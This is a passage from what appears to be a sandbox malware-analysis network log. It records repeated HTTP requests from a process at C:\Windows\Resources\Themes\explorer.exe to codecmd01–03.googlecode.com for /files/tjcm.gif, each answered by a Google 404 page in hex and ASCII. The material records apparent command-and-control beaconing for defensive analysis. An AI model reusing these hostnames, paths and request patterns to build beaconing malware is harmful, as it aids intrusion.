6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:12.355838060 CEST2689INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                26192.168.2.549879142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:13.655021906 CEST2697OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd03.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:13.681955099 CEST2698INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:13 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:13.682207108 CEST2699INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                27192.168.2.549880142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:15.027226925 CEST2699OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:15.063011885 CEST2701INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:15 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:15.063050032 CEST2701INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                28192.168.2.549881142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:16.399426937 CEST2702OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd02.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:16.426215887 CEST2703INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:16 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:16.426249981 CEST2704INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                29192.168.2.549882142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:17.677611113 CEST2704OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd03.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:17.704286098 CEST2706INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:17 GMT
